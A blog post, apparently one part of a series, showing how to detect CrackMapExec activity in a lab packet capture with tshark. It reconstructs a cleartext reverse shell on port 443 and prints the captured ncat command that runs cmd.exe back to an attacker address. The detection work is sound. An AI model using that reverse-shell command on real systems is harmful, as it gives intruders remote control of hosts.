Now that we know what a powershell command may look like when run via crackmapexec, let's take a look at the "normal" command being executed. In this case, if you remember in the first post  we executed "ncat.exe", let's see how we may be able to detect this with raw packet analysis.

As always, let's first look at the protocol hierarchy of our pcap.


root@securitynik:~/cme# tshark -n -r cme-ncat.pcap -z io,phs -q
===================================================================
Protocol Hierarchy Statistics
Filter: 

eth                                      frames:356 bytes:86187
  ip                                     frames:356 bytes:86187
    tcp                                  frames:356 bytes:86187
      nbss                               frames:160 bytes:34441
        smb                              frames:3 bytes:381
        smb2                             frames:157 bytes:34060
      dcerpc                             frames:31 bytes:39474
        isystemactivator                 frames:2 bytes:1644
        remunk                           frames:2 bytes:300
        dcerpc.stub_data                 frames:5 bytes:21630
        dcerpc.fragments                 frames:1 bytes:790
      data                               frames:13 bytes:989
      ssl                                frames:14 bytes:1075
        tcp.segments                     frames:4 bytes:256
===================================================================

Now that we have the protocol hierarchy, let's look at the TCP conversations


root@securitynik:~/cme# tshark -n -r cme-ncat.pcap -q -z conv,tcp
================================================================================
TCP Conversations
Filter:<No Filter>
                                                           |       <-      | |       ->      | |     Total     |    Relative    |   Duration   |
                                                           | Frames  Bytes | | Frames  Bytes | | Frames  Bytes |      Start     |              |
10.0.0.100:57950           <-> 10.0.0.105:445                  86     15850     100     15434     186     31284     0.023652000        20.0220
10.0.0.105:50602           <-> 10.0.0.100:443                  29      1600      28      2126      57      3726     3.366351000        32.4745
10.0.0.105:49666           <-> 10.0.0.100:43388                26      9658      23     28398      49     38056     0.145434000        19.8985
10.0.0.100:57952           <-> 10.0.0.105:445                  14      2952      15      2945      29      5897     0.042055000        19.9831
10.0.0.100:57948           <-> 10.0.0.105:445                   9      1638      10      1166      19      2804     0.000000000        20.0444
10.0.0.100:60342           <-> 10.0.0.105:135                   7      2808       9      1612      16      4420     0.098815000        19.9435
================================================================================

If we look at the first conversation above, we see it has the most bytes (15850). However, as we look at the second conversation, we see it has the longest duration of all the conversations (3.366 seconds). While we can start with the first conversation, I will instead in the interest of time start with the second, simply because it has the longest duration.


root@securitynik:~/cme# tshark -n -r cme-ncat.pcap -Y "( tcp.port == 50602 ) && ( tcp.port == 443 )" | more
  190   3.366351   10.0.0.105 → 10.0.0.100   TCP 66 50602 → 443 [SYN, ECN, CWR] Seq=0 Win=64240 Len=0 MSS=1460 WS=256 SACK_PERM=1
  191   3.366379   10.0.0.100 → 10.0.0.105   TCP 66 443 → 50602 [SYN, ACK] Seq=0 Ack=1 Win=29200 Len=0 MSS=1460 SACK_PERM=1 WS=128
  192   3.366597   10.0.0.105 → 10.0.0.100   TCP 60 50602 → 443 [ACK] Seq=1 Ack=1 Win=2102272 Len=0
  200   3.496322   10.0.0.105 → 10.0.0.100   TCP 96 50602 → 443 [PSH, ACK] Seq=1 Ack=1 Win=2102272 Len=42
  201   3.496342   10.0.0.100 → 10.0.0.105   TCP 54 443 → 50602 [ACK] Seq=1 Ack=43 Win=29312 Len=0
  202   3.496527   10.0.0.105 → 10.0.0.100   SSL 110 Continuation Data
  203   3.496533   10.0.0.100 → 10.0.0.105   TCP 54 443 → 50602 [ACK] Seq=1 Ack=99 Win=29312 Len=0
  204   3.511061   10.0.0.105 → 10.0.0.100   TCP 60 [TCP segment of a reassembled PDU]
  205   3.511078   10.0.0.100 → 10.0.0.105   TCP 54 443 → 50602 [ACK] Seq=1 Ack=101 Win=29312 Len=0
............

  347  30.994013   10.0.0.105 → 10.0.0.100   TCP 60 [TCP segment of a reassembled PDU]
  348  30.994030   10.0.0.100 → 10.0.0.105   TCP 54 443 → 50602 [ACK] Seq=18 Ack=545 Win=29312 Len=0
  349  30.994182   10.0.0.105 → 10.0.0.100   SSL 60 Continuation Data
  350  30.994188   10.0.0.100 → 10.0.0.105   TCP 54 443 → 50602 [ACK] Seq=18 Ack=549 Win=29312 Len=0
  351  35.836894   10.0.0.100 → 10.0.0.105   TCP 59 443 → 50602 [PSH, ACK] Seq=18 Ack=549 Win=29312 Len=5
  352  35.837355   10.0.0.105 → 10.0.0.100   TCP 60 50602 → 443 [PSH, ACK] Seq=549 Ack=23 Win=2102272 Len=5
  353  35.837371   10.0.0.100 → 10.0.0.105   TCP 54 443 → 50602 [ACK] Seq=23 Ack=554 Win=29312 Len=0
  354  35.840523   10.0.0.105 → 10.0.0.100   TCP 60 50602 → 443 [FIN, ACK] Seq=554 Ack=23 Win=2102272 Len=0
  355  35.840639   10.0.0.100 → 10.0.0.105   TCP 54 443 → 50602 [FIN, ACK] Seq=23 Ack=555 Win=29312 Len=0
  356  35.840840   10.0.0.105 → 10.0.0.100   TCP 60 50602 → 443 [ACK] Seq=555 Ack=24 Win=2102272 Len=0

From above, we see port 443 which suggests SSL communication. However, we see no SSL negotiation which is typically done after the 3 way handshake is completed. Considering there is no SSL negotiation, is there a possibility that we may be able to see the cleartext data? Let's reassemble the session via following the tcp stream to see what we get.


root@securitynik:~/cme# tshark -n -r cme-ncat.pcap -q -z follow,tcp,ascii,10.0.0.105:50602,10.0.0.100:443 | more
===================================================================
Follow: tcp,ascii
Filter: ((ip.src eq 10.0.0.105 and tcp.srcport eq 50602) and (ip.dst eq 10.0.0.100 and tcp.dstport eq 443)) or ((ip.src eq 10.0.0.100 and tcp.srcport eq 443) and (ip.dst eq 10.0.0.105 and t
cp.dstport eq 50602))
Node 0: 10.0.0.105:50602
Node 1: 10.0.0.100:443
42
Microsoft Windows [Version 10.0.17763.253]

(c) 2018 Microsoft Corporation. All rights reserved.
C:\>
whoami

whoami

securitynik\administrator
C:\>
net users
net users
User accounts for \\

-------------------------------------------------------------------------------

Administrator            Guest                    
krbtgt                   
nakia                    neysa                    nik                      
Prague                   
saadia                   
securitynik              
The command completed with one or more errors.

C:\>
exit
exit

Ahhh from above we see that even though the traffic is on port 443, we can see this communication is not encrypted. Interesting!

If we go through the other conversations, we see mostly unreadable traffic. However, as we follow the stream for the conversation with "10.0.0.105:49666" and "10.0.0.100:43388", we see the following:


root@securitynik:~/cme# tshark -n -r cme-ncat.pcap -q -z follow,tcp,ascii,10.0.0.105:49666,10.0.0.100:43388 | more
===================================================================
Follow: tcp,ascii
Filter: ((ip.src eq 10.0.0.105 and tcp.srcport eq 49666) and (ip.dst eq 10.0.0.100 and tcp.dstport eq 43388)) or ((ip.src eq 10.0.0.100 and tcp.srcport eq 43388) and (ip.dst eq 10.0.0.105 a
nd tcp.dstport eq 49666))
Node 0: 10.0.0.100:43388
Node 1: 10.0.0.105:49666

......
.......................f..... ..D.................object:Win32_ProcessStartup................................................................................................................
.............................................................................................................................................................................................
...........q........0....M............R....__PARAMETERS..cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\Windows\Temp\YkGcDv 2>&1..C:\....ri..........
....5.......,L....f....
.............................................................................................................................................................................................
.............................................................................................................................................................................................
...........p........0....L............Q....__PARAMETERS..cmd.exe /Q /c cd  1> \\127.0.0.1\C$\Windows\Temp\egHJIv 2>&1..C:\..I..........
....5....... h...r@....
.............................................................................................................................................................................................
....................0......................__PARAMETERS..cmd.exe /Q /c c:\tools\ncat.exe --nodns --exec cmd.exe 10.0.0.100 443 1> \\127.0.0.1\C$\Windows\Temp\vYsGjo 2>&1..C:\.Cg..........
....5..........WG......

Above we see from the rebuilt session that amongst other items, we see "ncat.exe" being executed with various arguments.

Ok. That's it for thist post.


References:
Wikipedia - ICMP protocol


Posts in this series:
Having Fun with CrackMapExec
Having Fun with CrackMapExec - Log Analysis
Having Fun with CrackMapExec - Packet Analysis - CrackMapExec
Having Fun with CrackMapExec - Zeek (Bro) Analysis
Having Fun with CrackMapExec - Snort IDS/IPS Analysis